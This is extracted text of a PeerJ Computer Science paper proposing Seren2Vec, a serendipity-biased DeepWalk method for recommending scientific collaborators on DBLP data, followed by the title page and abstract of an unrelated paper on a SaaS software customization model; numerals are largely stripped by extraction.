therefore, no consensus is reached on the definition of serendipity. in this paper, we aim to recommend the serendipitous scientific collaborators for target scholars by learning the vector representation of each scholar node in co-author network. the first essential step of this work is the definition of serendipitous collaborators. we induce the definition by three components of serendipity, which are relevance, unexpectedness, and value, respectively. relevance is quantified as the proximity between two connected nodes in co-author network. unexpected collaborators have research topics that are different from the topics of their target scholars; therefore, they usually have diverse research topics compared with their target scholars. while the value of a collaborator is quantified as the eigenvector (bonacich, ) of the collaborator node in the co-author network, which represents the influence of this collaborator. according to the nature of serendipity, we define that serendipitous collaborators are more unexpected and valuable, but less relevant for their target scholars. we reserve lower relevance for the significance of serendipity, because relevance caters to the preferences of target scholars. while the core components of serendipity are unexpectedness and value. consequently, the intuitive definition is that a serendipitous collaborator has high topic diversity, high influence and low network proximity relatively for his/her target scholar. the second essential step is the design of appropriate recommendation algorithm. though collaborative filtering is the most universal recommendation approach (kim et al., ; konstas, stathopoulos & jose, ), it is not yet applicable to our recommendation scenario. recently, researchers have shown increasing interest in the technology of network embedding. the vector representations of network nodes have also been applied to many prediction and recommendation tasks by learning relevant features of nodes successfully (perozzi, al- rfou & skiena, ; grover & leskovec, ; tian & zhuo, ). in this case, we design a serendipitous collaborators recommendation strategy by improving deepwalk (perozzi, al-rfou & skiena, ), where the walker jumps to the next node based on the proportional probability of its edge weight with the connected node in co-author network. besides, the edge weight between a collaborator and his/her target scholar is determined by the extent of serendipity. therefore, this is a serendipity-biased deepwalk for learning the vector representation of each author node in co-author network, and we call it seren vec. seren vec embeds each author node with a low-dimensional vector that carries serendipity between collaborators in the co-author network. we extract top-n collaborators for recommendation based on the cosine similarity between author vectors. to the best of our knowledge, this is the first work that takes serendipity into consideration when designing the collaborators recommender system. our strategy enabled us to simultaneously improve the serendipity of the recommendation list and to maintain xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. adequate accuracy. the definition of serendipitous collaborators is also significant for further mining the interesting collaboration mechanism in science. 
the main contributions of this paper can be summarized as follows: • define serendipitous scientific collaborators: we propose the intuitive definition of serendipitous scientific collaborators from three indices, which are network proximity, topic diversity, and collaborator influence, respectively. • propose a serendipity-biased deepwalk (seren vec): we improve the process of random walk in deepwalk for serendipitous collaborators recommendation. the walker jumps to the next neighbor node with the proportional probability of its edge weight with the connected node, and the edge weight is determined by the extent of serendipity. therefore, the vector representation of each author node is serendipity-biased. • recommend serendipitous scientific collaborators: we perform seren vec to learn the representation of each author node with low-dimensional vector, and then extract the top-n similar collaborators by computing the cosine similarity between the target vector and other author vectors. • analyze and evaluate the recommendation results: we conduct extensive experiments on the subset of dblp, and evaluate the recommendation results from both accuracy- based and serendipity-based metrics. furthermore, we compare the recommendation performance of seren vec with other baseline methods for validating our scheme. in the following sections: we first briefly review the related work, including the widely used collaborators recommendation approaches and the integration of serendipity in recommender systems. the proposed definition of serendipitous scientific collaborators and the corresponding indices are analyzed and quantified in ‘the definition of serendipitous collaborators’. the framework of our method is discussed in ‘the framework of seren vec’. the experimental results and metrics for evaluation are presented in ‘experiments’. finally we conclude the paper in the last section. related work researchers have designed various academic recommender systems for scientific applications. however, most existing recommendation approaches aim to improve the recommendation accuracy based on the profile similarity between users. long-term use of such recommender systems will degrade the user satisfaction, since most recommendations are the acquaintances of target users. the serendipity-related elements have attracted increasing attention from researchers for designing serendipitous recommender systems, such as novelty, unexpectedness, diversity, etc. in this section, we summarize the widely used collaborators recommendation approaches, the existing technologies for integrating serendipity into recommendation systems, and the serendipity-based metrics for evaluating the recommendation results. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. scientific collaborators recommender systems methods for recommending scientific collaborators have been studied for decades. the recommendation methods can be divided into content-based, collaborative filtering-based, and random walk-based algorithms on the whole. content-based recommendation content-based method is a basic and widely used technique for recommending collaborators. the critical process of content-based collaborators recommendation is the scholar profile modelling, where the interests or topics of scholars can be inferred from their publication contents by extracting the words from title, abstract, keywords, etc. 
many topic modeling techniques such as word vec (goldberg & levy, ), lda (latent dirichlet allocation) (blei, ng & jordan, ) and plsa (probabilistic latent semantic analysis) (hofmann, ) enable to generate the probability distribution of these words, and they also contribute to generate the feature descriptions of different scholars. a collaborator recommendation list is finally generated by computing the profile similarity between scholars. gollapalli, mitra & giles ( ) proposed a recommendation model by computing the similarity between expertise profiles. besides, the expertise profiles are extracted from researchers’ publications and academic home pages. lopes et al. ( ) took the area of researchers’ publications and the vector space model to make collaboration recommendation. the scientific collaboration mechanism is complex for the various factors. wang et al. ( ) investigated the academic-age-aware collaboration behaviors, which may guide and inspire the collaborators recommendation strategies. collaborative filtering-based recommendation collaborative filtering-based method is popular in the field of recommender system. the core of collaborative filtering is to find items via the opinions of other similar users whose previous history strongly correlates with the target user. in other words, the similar users have similar interests with the target user (jannach et al., ). finally, the items positively rated by the similar users will be recommended to the target user. heck, peters & stock ( ) performed a collaborative filtering method via the co-citation and bibliographic coupling to detect author similarity. however, the cold start problem exists to degrade the recommendation performance, because it is difficult to find similar scholars without enough information of a new scholar. content-based algorithms require contents to analyze by utilizing natural language processing (nlp) tools, therefore the collaborative filtering-based algorithms are more easy to implement without the requirement of contents (hameed, al jadaan & ramachandram, ). random walk-based recommendation random walk is the most common technique for collaborators recommendation. the basic idea of random walk is to compute the structure similarity between nodes in co-author network based on the transition probability. xia et al. ( ) explored three academic factors, i.e., coauthor order, latest collaboration time, and times of collaboration, to quantify the link importance and performed a biased random walk in academic social network for recommending most valuable collaborators. araki et al. ( ) made use of xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. both topic model and random walk with restart method for recommending interdisciplinary collaborators. they combined the content-based and random-walk based methods for collaborators recommendation. kong’s works (kong et al., ; kong et al., ) exploited the dynamic research interests, academic influences and publication contents of scholars for collaborators recommendation. random walk can be improved flexibly by adjusting its transition matrix, therefore it have been widely used by researchers in their recommendation scenarios. to sum up, all kinds of recommendation algorithms are designed based on the similarity between academic entities in order to enhance the recommendation accuracy. most of them ignore the integration of other serendipity-related elements for the design of recommender systems. 
consequently, they are not applicable to our task of recommending serendipitous collaborators. serendipity in recommender systems increasing researchers are interested in investigating serendipity in recommender systems, kotkov, wang & veijalainen ( ) wrote a survey to summarize the serendipity problem in recommender systems, including the related concepts, the serendipitous recommendation technologies and metrics for evaluating the recommendation results. they also analyzed the challenges of serendipity in recommender systems (kotkov, veijalainen & wang, ). herlocker et al. ( ) considered that serendipitous recommendations aim to help users finding interesting and surprising items that they would not discover by themselves. while shani and gunawardana (shani & gunawardana, ) described that serendipity associates with users’ positive emotions on the novel items. the serendipitous items usually are unexpected and useful simultaneously for a user (manca, boratto & carta, ; iaquinta et al., ). from these perspectives, serendipity emphasizes the unexpectedness and value components. serendipitous recommendation approaches various serendipity-enhancement approaches have been proposed by researchers. zhang & hurley ( ) suggested to maximize the diversity of the recommendation list and kept adequate similarity to the user query for avoiding monotonous recommendations. zhang et al. ( ) proposed a full auralist recommendation algorithm in order to balance the accuracy, diversity, novelty and serendipity of recommendations simultaneously. however, the auralist algorithm is difficult to realize for its complexity. said et al. ( ) proposed a new k-furthest neighbor (kfn) recommendation algorithm in order to recommend novel items by selecting items which are disliked by dissimilar users. onuma, tong & faloutsos ( ) proposed a novel tangent algorithm to broaden user tastes, and they aim to recommend the items in a graph that not only are relevant to the target users, but also have connectivity to other groups. evaluation of serendipitous recommender systems in terms of the evaluation of the proposed serendipitous recommendation strategies, the widely used metrics are unexpectedness, usefulness and serendipity, where serendipity is the combination of unexpectedness and usefulness metrics. adamopoulos & tuzhilin ( ) xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considered that an unexpected item is not contained in the set of expected items of the target user, and the usefulness of an item can be approximated by the items’ ratings given by users. murakami, mori & orihara ( ) and ge, delgado-battenfeld & jannach ( ) indicated that the unexpectedness metric is determined by the primitive recommendation methods which produce relevant recommendations, and the item not in primitive recommendation set is regarded as an unexpected item. the serendipity of the recommendation list is determined by the rate of both unexpected and useful items (zheng, chan & ip, ; ge, delgado-battenfeld & jannach, ; murakami, mori & orihara, ). meanwhile, zheng, chan & ip ( ) suggested that the usefulness of a recommended item depends on whether the target user selects or favors it. these literatures shed some light on the development of serendipitous recommender systems in different fields. our work also refer to them for extracting the core components of serendipity, and evaluating the serendipitous recommendations from the serendipity- based metrics. 
the definition of serendipitous collaborators ‘‘serendipity’’ has been recognized as one of the most untranslatable words. the term serendipity origins from a fairy tale, ‘‘the three princes of serendip’’ (west, ). the three princes were always making fortunate discoveries in their wandering adventures, and the accidental but valuable discoveries denote serendipity. nevertheless, it is unclear what makes a collaborator serendipitous to his/her target scholar. in this paper, we define serendipitous scientific collaborators from three components: relevance, unexpectedness and value, corresponding with the indices of network proximity, topic diversity, and collaborator influence, respectively. we describe the details of these indices and their quantifications in the following three subsections. relevance score relevance between target scholar and his/her collaborators may be quantified with their proximity in co-author network. therefore, we perform random walk with restart (rwr) (vargas & castells, ; tong, faloutsos & pan, ) in the co-author network for computing the relevance score of all collaborator nodes for their target scholars. finally, we get the relevance score between each pair of collaborators. unexpectedness score unexpected scientific collaborators have connectivity to different research areas of their target scholars. such unexpected collaborators may expand target scholars’ horizons, since they have diverse research topics compared with their target scholars. we get each scholar’s research areas by lda (blei, ng & jordan, ), and a collaborator who has connectivity to other areas different from that of his/her target scholar is regarded as a unexpected collaborator. lda computes the cosine similarity between the topic probability distribution of each scholar and area, where the topic probability distribution of a scholar is parsed from his/her publication contents, and the topic probability distribution of an area is extracted from the proportion of each topic contained in this area. the areas xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the framework of seren vec. the core of this framework is the attachment of serendipity to the collaboration edges, and the edge weight is quantified based on the three indices in definition in a linear way. therefore, seren vec contributes to a serendipity-biased representation learn- ing. full-size doi: . /peerjcs. /fig- with similarity higher than . are regarded as the research areas of a scholar. finally we add the betweenness centrality (leydesdorff, ) of a collaborator node with the number of communities it crosses as its unexpectedness score for its target scholar, since betweenness centrality represents the ability of a node to transfer information among separate communities in a network, which stresses the strong position of unexpected node. value score value of a scholar is defined as the influence of this scholar node, and more influential nodes are more valuable for his/her collaborators in co-author network. we compute the value scores of all collaborator nodes with the eigenvector centrality (bonacich, ), where the centralized value of a node is determined by the nodes linked by it. if the high-degree node connects with the target node, it usually are more valuable than those low-degree nodes for the target node. 
besides, the influence of a node not only depends on its degree, but also depends on its neighbor nodes’ influences according to the peculiarity of eigenvector centrality. the relevance, unexpectedness, and value scores are computed between each pair of collaborators according to above quantification methods. a serendipitous collaborator has high unexpectedness score, high value score, and low relevance score for his/her target scholar relatively. the framework of seren vec in this section, we propose the framework of seren vec, which aims to recommend serendipitous collaborators for scholars by learning the vector representation of each author node in co-author network. the whole framework of seren vec is shown in fig. , which contains four main steps: ( ) compute the relevance, unexpectedness and value scores of each collaborator for his/her target scholar. ( ) construct a co-author network based on the collaboration data extracted from dblp, where the edge weight is determined by the linear combination of relevance, unexpectedness and value scores. ( ) perform seren vec in co-author network, where the walker jumps to the next node b from node a with the proportional probability of their edge weight. the edge weight xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. is attached with the extent of serendipity, i.e., w in fig. shows the serendipity extent brought by b for target scholar a. ( ) learn the representations of all author nodes with low dimensional vectors, and then compute the cosine similarity betweenauthor vectors for generating the recommendation list composed of top-n similar collaborators. integrate serendipity into co-author network we first integrate serendipity into co-author network g=(v,e) for vector representation learning of author nodes. the node v ∈v in network represents the author, and edge e ∈e reflects the collaboration relationship between two connected nodes. we attach the serendipity of a collaborator for his/her target scholar to their edge weight. from fig. , our co-author network is directed, because the edge weight of node a to b is different from that of b to a. in other words, the serendipity brought by a for b is different from that of b for a, since a’s relevance, unexpectedness and value scores for b are different from that of b for a. serendipitous collaborators are unexpected and valuable, but less relevant for their target scholars; therefore, we combine three indices as the edge weight in a linear way. the expression of edge weight is as follows: w =α×rs+β×us+γ ×vs, ( ) where rs,us and vs represent the relevance score, unexpectedness score, and value score, respectively. while α is smaller than β and γ , as α determines the proportion of relevance score, and α+β+γ = . we aim to adjust these parameters and find the optimal collocation of them by analyzing the experimental results. seren vec we improve the traditional deepwalk model to learn vector representations of author nodes in co-author network for our recommendation task. in terms of deepwalk, the walker during random walk jumps to the next node with the equal probability, n , where n represents the number of last node’s collaborators. deepwalk excludes the importance or corresponding attributes of nodes. take the random walk process in fig. as an example, the walker arrives at node a, and continues to walk to the next node. it will walk to b with the probability of according to deepwalk. 
in this work, we distinguish the importance of the collaborator nodes based on the extent of serendipity they bring to their target nodes. the extent of serendipity brought by collaborator b for target scholar a corresponds to their edge weight w(a, b); if w(a, b) is higher than the weights of a's edges to its other neighbors, the walker jumps from a to b with a higher probability. we attach serendipity to the edge weights of the co-author network, which finally yields a serendipity-biased deepwalk. as a consequence, the author vector representations carry the attribute of serendipity: if a collaborator is serendipitous for a target scholar, his/her vector representation is similar to that of the target scholar.

the complete algorithm is described in algorithm , where b represents the set of betweenness centralities of the author nodes and b_i denotes the betweenness centrality of node i. rs(i, j), us(i, j), and vs(i, j) correspond to the relevance score, unexpectedness score, and value score of collaborator j for his/her target scholar i, respectively. the flow chart of seren2vec is shown in fig. .

algorithm : seren2vec
input: graph g = (v, e), transfer matrix t, betweenness centrality set b, community degree set c, eigenvector centrality set e, parameters α, β, γ, context size w, dimension of vertex vector d, walks per vertex r, walk length l, length of recommendation list n
output: recommendation list rec
    for edge (i, j) ∈ e do rs(i, j) = rwr(j, t)
    for edge (i, j) ∈ e do us(i, j) = b_j + c_j
    for edge (i, j) ∈ e do vs(i, j) = e_j
    build the weighted co-author network
    for edge (i, j) ∈ e do weight(i, j) = α × rs(i, j) + β × us(i, j) + γ × vs(i, j)
    for k = 0; k < r; k++ do
        for u ∈ v do
            walk[u] = biased random walk(g, u, l)
    p = skipgram(walk, w)
    for t = 0; t < row(p); t++ do
        rec[t] = top-n similar collaborators
    return rec

figure : the flow chart of seren2vec. seren2vec includes three main processes: integration of serendipity into deepwalk, vector representation learning of each scholar, and collaborator recommendation based on the cosine similarity between vectors.

vector representation of graph

the random walker moves on the co-author network from scholar node i to its collaborator node j with probability p(i, j):

p(i,j) = \frac{weight(i,j)}{\sum_{q \in m(i),\, q \neq i} weight(i,q)}, ( )

where m(i) is the set of scholar i's collaborators. perozzi, al-rfou & skiena ( ) observed that if a random walk is performed on a network whose degree distribution follows a power law, the visited nodes also follow a power-law distribution, which is the same distribution as term frequencies in natural language. therefore, it is reasonable to regard a node in the network as a word and to treat the sequence of vertices visited during a random walk as a sentence.
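a minimal sketch of this pipeline is shown below, assuming the edge weights from eq. ( ) are already available (for example from the earlier sketch). it is an illustration rather than the authors' implementation: gensim (version 4 or later) is used as a stand-in for the skip-gram step with hierarchical softmax described next, and the walk counts, walk length, dimension, and window size are placeholder values rather than the settings reported in the experiments.

```python
# minimal sketch (not the authors' implementation): serendipity-biased walks with
# transition probability p(i,j) = weight(i,j) / sum_q weight(i,q), skip-gram
# training on the resulting "sentences", and cosine-similarity ranking.
import random
from gensim.models import Word2Vec  # pip install gensim (>= 4)

def biased_walk(G, weights, start, length):
    walk, node = [start], start
    for _ in range(length - 1):
        nbrs = list(G.successors(node))
        if not nbrs:
            break
        w = [weights[(node, n)] for n in nbrs]
        node = random.choices(nbrs, weights=w, k=1)[0]  # proportional to edge weight
        walk.append(node)
    return walk

def seren2vec(G, weights, walks_per_node=10, walk_length=40, dim=64, window=5):
    sentences = [biased_walk(G, weights, u, walk_length)
                 for _ in range(walks_per_node) for u in G]
    # skip-gram (sg=1) with hierarchical softmax (hs=1), matching the description.
    return Word2Vec(sentences, vector_size=dim, window=window,
                    sg=1, hs=1, min_count=0, workers=2)

# top-n recommendation for a target scholar by cosine similarity between vectors:
# model = seren2vec(G, w)                 # G and w as built in the earlier sketch
# print(model.wv.most_similar("a", topn=5))
```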
specifically, in order to learn the vector representations of vertices, seren vec makes use of the local information from the truncated random walks by maximizing the probability of a vertex vi in terms of the previous vertices being visited in the random walk: p({vi−w,...,vi+w}\vi|φ(vi))= i+w∑ j=i−w,j =i p(vj|φ(vi)), ( ) where φ denotes the latent topological representation associated with each vertex vi in the graph, and φ is a matrix with |v |×d. for speeding the training time, hierarchical softmax is used to approximate the probability distribution by allocating the vertices to the leaves xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the binary tree, and we compute p(vj|φ(vi)) as follows: p(vj|φ(vi))= dlog|n|e∑ l= +e−φ(vi)·ψ(sl) , ( ) where ψ(sl) represents the parent of the tree node sl. in addition, (s ,s ,...,slog|v |) is the sequence to detect the vertex vj, and s is the tree root. the output of seren vec is the latent vector representations of all scholar nodes with d-dimension in our co-author network. we calculate the cosine similarity between other vectors with the target scholar vector vi: sim(xvi,xvj )= xvi ·xvj√ |xvi|·|xvj| ,vj ∈v and vj =vi. ( ) finally, top-n similar scholars, who are serendipitous to the target scholar, are contained in the collaborator list for recommendation. experiments in this section, we analyze and compare the performance of seren vec with other baseline methods for the serendipitous collaborators recommendation. we initialize the context size w as , the vector dimension d as , number of walks r as , and walk length l as for conducting experiments. data set we extract collaboration data from five areas including artificial intelligence, computer graphics and multimedia, computer networks, data mining and software engineering in dblp data set. the co-author network is built by utilizing the collaboration data from year to , and there are , nodes and , edges in the network. we randomly choose authors who have one collaborator at least as the target scholars, and the final goal of our work is to recommend the serendipitous collaborators for them via seren vec. baseline methods deepwalk deepwalk (perozzi, al-rfou & skiena, ) is a widely used network embedding algorithm, which learns the latent vector representations of nodes in a network. it takes a graph as input and outputs the latent vector representations of all nodes in graph. deepwalk can be easily utilized to obtain the author vectors. the core idea of deepwalk is to take the random walk paths in network as sentences, and nodes as words. applying the sentence sequences to skipgram enable to learn the distributed representations of nodes. node vec node vec (grover & leskovec, ) is a improved version of deepwalk. it improves the strategy of random walk through the parameters p and q, and considers the macrocosmic and microcosmic information simultaneously. node vec controls the transition probability of walker, where p represents the returning probability, and q denotes the probability of jumping to the next node. while deepwalk sets both p and q at , and ignores other factors that will influence the generation of sentence sequences. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rwrw we also compare our seren vec with the baseline algorithm which does not adopt the vector representation strategy. 
therefore, we run the serendipity-biased random walk with restart algorithm on our weighted co-author network (rwrw) for comparison. tangent the tangent (onuma, tong & faloutsos, ) algorithm is designed to recommend the relevant collaborators who have connectivity to other groups. kfn the kfn (said et al., ) algorithm aims to recommend the novel collaborators who are disliked by the dissimilar neighborhood of the target scholar. this approach is contrary to k nearest neighbors (knn) (deng et al., ). evaluation metrics we refer to the metrics in ge, delgado-battenfeld & jannach ( ), zheng, chan & ip ( ) and kotkov, wang & veijalainen ( ) for evaluating our serendipitous collaborators recommendation, which are the serendipity-based metrics including unexpectedness, value and serendipity. we compute the average rs and us of each target scholars’s collaborators. if rs of one collaborator is higher than the average rs, and on the contrary, his/her us is lower than the average us, we regard this collaborator as the expected one of target scholar. expected collaborators are more relevant and less unexpected than other collaborators for their target scholars. according to ge, delgado-battenfeld & jannach ( ) and zheng, chan & ip ( ), a recommended collaborator not in the set of target scholar’s expected collaborators is considered as unexpected. therefore, we extract the expected collaborators of each target scholar first, and a recommended collaborator not in the expected set is evaluated as unexpected. the unexpectedness is measured as the rate of unexpected collaborators in the recommendation list. in terms of the metric of value, zheng, chan & ip ( ) measured the usefulness of a recommended item through its rating given by the target user. while in our recommendation scenario, we analyze the collaboration times between the recommended collaborator and target scholar in the next years. if their collaboration times is over or equal to times from to , the recommended collaborator is evaluated as valuable. besides, the value is measured as the rate of valuable collaborators in the recommendation list. ge, delgado-battenfeld & jannach ( ) combined the unexpectedness and value metric to evaluate serendipity. similarly, we measure serendipity through the rate of collaborators who are both unexpected and valuable for the target scholar in the recommendation list. recommendation results analysis we take the widely used serendipity-based metrics to evaluate our recommendation results, including unexpectedness, value and serendipity. therefore, the evaluations are no longer limited by the accuracy-based metrics. in this section, we examine the effects of different experimental parameter sets on the recommendation performance, including the range of d, r, l, w, different combinations of α, β and γ , and the length of recommendation list n . xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure effects of the recommendation list length and different combinations of α, β and γ on rec- ommendation performance via seren vec. (a) precision (b) recall (c) unexpectedness (d) value and (e) serendipity of the recommendations. (when α= . ,β= . , and γ = . , seren vec shows the highest precision, value and serendipity. meanwhile, the optimal n is ). full-size doi: . /peerjcs. /fig- effects of the recommendation list we measured the recommendation results with different length of recommendation list n and different combinations of α,β and γ via seren vec. 
the results shown in fig. indicate that when α= . , β= . and γ = . , the recommendation performance is better than others with respect to the precision fig. a), value (fig. d) and serendipity (fig. e) evaluations. we also find that the optimal n is . the precision, value and serendipity decrease with the increases of n , which are contrary to the recall (fig. b) and unexpectedness (fig. c). furthermore, the unexpectedness of different combinations keeps close distributions with the variation of n . furthermore, we show the effects of the recommendation list length with α= . ,β= . , and γ = . via different baseline methods. from fig. , node vec obtains the highest precision (fig. a) and recall (fig. b), but it shows the worst performance from the serendipity-based metrics (figs. c– e) evaluation. our seren vec outperforms others in terms of the serendipity-based metrics, and keeps adequate accuracy simultaneously. rwrw has lower precision than seren vec because it lacks the vector representation process, but it has the second highest serendipity finally because of the serendipity-biased random walk. meanwhile, the collaborators recommended by seren vec show higher unexpectedness than others when the length of recommendation list is lower than . node vec and deepwalk share close serendipity with low value, because they have not integrated other serendipity-related elements into the vector representation learning. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure effects of the recommendation list length with α = . ,β = . , and γ = . on rec- ommendation performance via different baseline methods. (a) precision (b) recall (c) unexpectedness (d) value and (e) serendipity of the recommendations. (node vec shows the highest accuracy. seren vec shows the highest serendipity, and it is superior to rwrw in terms of the precision evaluation). full-size doi: . /peerjcs. /fig- parameter sensitivity we tested the recommendation performance with different parameters, and the length of recommendation list is optimally five according to the last subsection. when testing one parameter of l (fig. a), r (fig. b), d (fig. c), w (fig. d) with different values on the recommendation performance, we fix other three parameters with corresponding initial values. we can get from fig. that the measurements from both accuracy-based and serendipity-based metrics almost have the steady distributions under different parameter sets. we take the set where r = , d = , l = and w = as our final parameter set, since each of them contributes to the highest serendipity and maintains adequate accuracy simultaneously. performance comparison next, we compare our seren vec which are assigned to the optimal parameters with other two baseline methods. we set the length of recommendation list of tangent and kfn as , which is the same with seren vec. from the comparison results in fig. , seren vec obtains better performance for recommending the serendipitous collaborators via the evaluations from serendipity-based metrics, since it adopts the serendipity-biased representation learning strategy. its highest value contributes to the highest serendipity. tangent and kfn stress the unexpectedness of recommendations, but they ignore the value component of serendipity. therefore, they are inferior to seren vec in terms of the serendipity evaluation. seren vec outperforms other two methods except for the unexpectedness evaluation, which is . 
lower than the unexpectedness of tangent, xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure effects of different d, r, l and w on recommendation performance. (a) the effects of l (b) r (c) d and (d) w. (seren vec almost keeps steady distribution on recommendation performance with the variation of parameters). full-size doi: . /peerjcs. /fig- but . higher than that of kfn. furthermore, we find that the recall of three methods are very low, and seren vec has higher recall than tangent and kfn slightly. in summary, our proposed seren vec is superior to other baseline methods for recommending more serendipitous collaborators. it learns the serendipity-biased vector representation of each author node in co-author network successfully, which integrates the serendipity between two connected nodes. conclusion this paper introduces the scientific collaborators from a new perspective of serendipity. the serendipitous collaborator has high topic diversity, high influence and low proximity in co-author network for his/her target scholar relatively. we focused on designing an effective algorithm to integrate serendipity into collaborators recommender system. specifically, we improved the deepwalk algorithm, where the sentence sequences are generated by performing a serendipity-biased random walk. seren vec represents the author nodes in the co-author network with the low-dimensional vectors, which are attached with the attributes of serendipity successfully. finally, we computed the cosine similarity between xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure performance comparisons between different recommendation methods. (seren vec is supe- rior to tangent and kfn by evaluating from both precision and serendipity metrics). full-size doi: . /peerjcs. /fig- the vector of target scholar and other vectors, and extracted top-n similar collaborators for recommendation. the extensive experiments are conducted on the dblp data set, and the experimental results show that seren vec is more effective than other baseline approaches by evaluating from the serendipity-based metrics. seren vec improves the serendipity of recommendation list and maintains adequate accuracy simultaneously. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • zhenzhen xu analyzed the data. • yuyuan yuan conceived and designed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. • haoran wei performed the experiments, performed the computation work. • liangtian wan contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: data is available at https://snap.stanford.edu/data/com-dblp.html. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adamopoulos p, tuzhilin a. . on unexpectedness in recommender systems: or how to better expect the unexpected. 
acm transactions on intelligent systems and technology ( ):article . araki m, katsurai m, ohmukai i, takeda h. . interdisciplinary collaborator recommendation based on research content similarity. ieice transactions on information and systems ( ): – doi . /transinf. dap . blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research (jan): – . bonacich p. . some unique properties of eigenvector centrality. social networks ( ): – doi . /j.socnet. . . . deng z, zhu x, cheng d, zong m, zhang s. . efficient knn classification algorithm for big data. neurocomputing : – doi . /j.neucom. . . . ge m, delgado-battenfeld c, jannach d. . beyond accuracy: evaluating recommender systems by coverage and serendipity. in: proceedings of the fourth acm conference on recommender systems. new york: acm, – doi . / . . goldberg y, levy o. . word vec explained: deriving mikolov et al.’s negative- sampling word-embedding method. arxiv preprint. arxiv: . . gollapalli sd, mitra p, giles cl. . similar researcher search in academic environ- ments. in: proceedings of the th acm/ieee-cs joint conference on digital libraries. new york: acm, – doi . / . . grover a, leskovec j. . node vec: scalable feature learning for networks. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – doi . / . . hameed ma, al jadaan o, ramachandram s. . collaborative filtering based recommendation system: a survey. international journal on computer science and engineering ( ): – . heck t, peters i, stock wg. . testing collaborative filtering against co-citation analysis and bibliographic coupling for academic author recommendation. in: proceedings of the rd acm recsys’ workshop on recommender systems and the social web. new york: acm, – . herlocker jl, konstan ja, terveen lg, riedl jt. . evaluating collaborative filtering recommender systems. acm transactions on information systems (tois) ( ): – doi . / . . xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://snap.stanford.edu/data/com-dblp.html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /transinf. dap http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hofmann t. . probabilistic latent semantic indexing. acm sigir forum ( ): – doi . / . . iaquinta l, de gemmis m, lops p, semeraro g, molino p. . can a recommender system induce serendipitous encounters? in: e-commerce. london: intech. jannach d, zanker m, felfernig a, friedrich g. . recommender systems: an introduction. cambridge: cambridge university press. kim h-n, ji a-t, ha i, jo g-s. . collaborative filtering based on collaborative tagging for enhancing the quality of recommendation. electronic commerce research and applications ( ): – doi . /j.elerap. . . . kong x, jiang h, wang w, bekele tm, xu z, wang m. . exploring dynamic research interest and academic influence for scientific collaborator recommendation. scientometrics ( ): – doi . /s - - - . kong x, jiang h, yang z, xu z, xia f, tolba a. . exploiting publication con- tents and collaboration networks for collaborator recommendation. plos one ( ):e doi . /journal.pone. . konstas i, stathopoulos v, jose jm. . on social networks and collaborative recommendation. 
submitted march
accepted august
published september

corresponding author abdulrazzaq qasem ali, abdulrazzaq.alyhari@gmail.com
academic editor stefan wagner
additional information and declarations can be found on page
doi . /peerj-cs.
copyright ali et al.
distributed under creative commons cc-by .
open access

development of a valid and reliable software customization model for saas quality through iterative method: perspectives from academia

abdulrazzaq qasem ali, abu bakar md sultan, abdul azim abd ghani and hazura zulzalil
department of software engineering and information system, faculty of computer science and information technology, universiti putra malaysia, serdang, selangor, malaysia

abstract
despite the benefits of standardization, the customization of software as a service (saas) applications is also essential because of the many unique requirements of customers. this study, therefore, focuses on the development of a valid and reliable software customization model for saas quality that consists of ( ) generic software customization types and a list of common practices for each customization type in the saas multi-tenant context, and ( ) key quality attributes of saas applications associated with customization. the study was divided into three phases: the conceptualization of the model, analysis of its validity using saas academic-derived expertise, and evaluation of its reliability by submitting it to an internal consistency reliability test conducted by software-engineering researchers. the model was initially devised based on six customization approaches, customization practices, and quality attributes in the saas multi-tenant context. subsequently, its content was validated over two rounds of testing, after which one approach and practices were removed and practices were reformulated. the internal consistency reliability study was thereafter conducted by software-engineering researchers. all constructs of the content-validated model were found to be reliable in this study.
the final version of the model consists of constructs and items. these six constructs and their associated items are as follows: ( ) configuration (eight items), ( ) composition (four items), ( ) extension (six items), ( ) integration (eight items), ( ) modification (five items), and ( ) saas quality ( items). the results of the study may contribute to enhancing the capability of empirically analyzing the impact of software customization on saas quality by benefiting from all resultant constructs and items.

